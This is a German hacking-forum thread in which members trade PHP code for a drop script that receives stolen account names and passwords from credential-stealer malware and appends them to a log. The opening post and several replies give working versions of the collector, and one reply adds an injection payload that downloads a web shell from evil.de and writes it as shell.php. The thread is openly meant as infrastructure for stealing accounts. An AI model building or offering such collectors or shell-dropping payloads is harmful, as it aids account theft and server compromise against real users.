Ergebnis 1 bis 6 von 6
  1. 10.05.2009, 02:28 #1
    Perishand
    Perishand ist offline
    CIH-Virus Avatar von Perishand
    Registriert seit
    11.08.2007
    Beiträge
    437

    Standard [B]Daten per PHP versenden

    Weil die Methode mit dem Ftp ja nicht so super ist und jeder (eigentlich) die Daten abfangen kann, gibts ja die schöne Möglichkeit, die Daten an eine php zu senden.

    Ich werde euch kurz zeigen, wie dies funktioniert, zum einbauen in Stealer usw. müsst ihr es allerdings ummodden.

    Code:
    <?php
$filename="List.log";
$nl = chr(13).chr(10); 
$acc = $_GET["acc"];
$art = $_GET["art"];
$pw = $_GET["pw"];
$fp=fopen("List.log", "a");
fputs($fp, $art);
fputs($fp, $nl);
fputs($fp, $acc);
fputs($fp, ":");
fputs($fp, $pw);
fputs($fp, $nl);
fputs($fp, $nl);
fclose($fp);
?>
    So sieht unsere .php Datei aus.

    Zur erklärung:

    Code:
    $filename="List.log";
    Ist eure Datei auf dem FTP, endung egal.

    Code:
    $nl = chr(13).chr(10);
    Deklaration für einen Zeilenumsprung

    Code:
    $acc = $_GET["acc"];
    Der Variable "$acc" wird der Wert zugewiesen, den wir als "acc" angeben. (erklärung gleich)

    Code:
    $fp=fopen("List.log", "a");
    Öffnet die Datei "List.log" mit dem Attribut "a" (heißt schreibrechte, wenn Datei nicht vorhanden wird sie erstellt)

    Code:
    fputs($fp, $art);
    Wir schreiben in die Datei (List.log) unseren Wert der Variable "$art"

    Code:
    fputs($fp, $nl);
    Sorgt für einen Zeilenumsprung.

    Code:
    fputs($fp, ":");
    Schreibt hinter unseren Accnamen ein ":" zur besseren wiedererkunng für "Nameasswort"

    Code:
    fclose($fp);
    Schließt unsere .log Datei



    Wie schreiben wir nun einen Wert in die Variablen?

    Ganz einfach:

    Code:
    
www.euerhoster.de/script.php?art=::::Rapidshare::::&acc=Accname&pw=AccPasswort
    Code:
    http://www.euerhoster.de/script.php?
    Eure Seite, mit dem Link zu eurem Php Script

    Code:
    art=::::Rapidshare::::
    Der Variable art (die wir in unserem Php Script mit $art festgelegt haben) wird nun "::::Rapidshare::::" zugewiesen.


    Und so werden die anderen Variablen mit einem "&" und direkt dahinter ohne leerzeichen angefügt. So schreibt ihr dann eure Daten in die List.log ohne jeglichen Ftp Daten und sonstige Daten anzugeben.



    Ich hoffe einige können es gebrauchen, bei Fragen hier im Thread schreiben.

    Crimeny
    Geändert von Perishand (10.05.2009 um 02:31 Uhr) Grund: Es ist spät, habe mich verschrieben
    Zitieren Zitieren
  2. 10.05.2009, 03:49 #2
    hpoc
    hpoc ist offline
    Gesperrt
    Registriert seit
    23.03.2009
    Beiträge
    438

    Standard

    War meine Idee doch nicht so schlecht. Auch wenn ich das Ganze anderst realisieren würde.
    Bei Lust und Laune schreib dafür mal ein Tutorial, wie ich mir das so vorgestellt habe.
    Zitieren Zitieren
  3. 10.05.2009, 07:16 #3
    bl0b
    bl0b ist offline
    DateMake Dialer Avatar von bl0b
    Registriert seit
    25.04.2009
    Beiträge
    117

    Standard

    Die Idee war natürlich nicht schlecht, nur ist der Upload per FTP halt "gegebener" und üblich in den Scene Tools. Bei dieser Möglichkeit besteht einfach das Risiko, dass das Script relativ leicht gefloodet werden kann, da keinerlei Daten abgefragt werden. Evt. sollte man eine IP Sperre einbauen, so dass nur alle 5 Minuten was eingetragen werden kann.

    Mal kurz überarbeitet:
    PHP-Code:
    <?php
    $filename     "List.log";
    $acc $_GET["acc"];
    $art $_GET["art"];
    $pw $_GET["pw"];
    $fp fopen("List.log""a");
    fwrite($pf$art."\r\n".$acc.":".$pw."\r\n\r\n")
    fclose($fp);
    ?>
    Genau das gleiche Script, nur etwas kürzer und unsinniger Coder wurde entfernt.
    Zitieren Zitieren
  4. 10.05.2009, 09:58 #4
    TamCore
    TamCore ist offline
    Gesperrt
    Registriert seit
    18.11.2007
    Beiträge
    669

    Standard

    PHP-Code:
    <?php
       $file     "List.log";
           $art  $_GET["art"];
           $acc  $_GET["acc"];
           $pass $_GET["pw"]; 
           file_put_contents($file$art."\n".$acc.":".$pw."\n\n"FILE_APPEND);
    ?>
    Noch kürzer
    Zitieren Zitieren
  5. 10.05.2009, 10:13 #5
    VeN0m
    VeN0m ist offline
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Mich stört daran nur eine Kleinigkeit. Die Parameter, die übergeben werden werden nicht überprüft. Theoretisch könnte ich in die Log-Datei etwas wie
    Code:
    <?php

$content = file_get_contents("http://evil.de/shell.txt");
$handle = fopen("shell.php","a");
fwrite($handle,$content);
fclose($handle);

?>
    einschleusen. Und im Nachhinein betrachtet ist diese Variante genauso unsicher, wie ein eingeben der FTP-Daten in einen Stealer, der diese evtl. unverschlüsselt im Quellcode speichert.

    Ach ja. Ich will jetzt auch mal ^^.

    PHP-Code:
    <?php
    file_put_contents    ("List.log"$_GET['art']."\n".$_GET['acc'].":".$_GET['pw']."\n\n"FILE_APPEND);
    ?>
    Naja... Aber baue lieber etwas ein, was überprüft, was als Parameter übergeben wird. Sonst kann das ganze ziemlich schnell schlecht enden. Oder eben das Argument mit dem Spam: Hitfaker draufjagen und Du siehst nicht mehr, welche Accounts überhaupt echt sind.
    Geändert von VeN0m (10.05.2009 um 10:16 Uhr)
    Come to the dark side - We have cookies
    Zitieren Zitieren
  6. 10.05.2009, 21:40 #6
    hpoc
    hpoc ist offline
    Gesperrt
    Registriert seit
    23.03.2009
    Beiträge
    438

    Standard

    Finde diese Varianten die ihr vorgeschlagen habt, mehr als schlecht. Sollte ich Zeit finden werde ich euch meine presentieren.
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln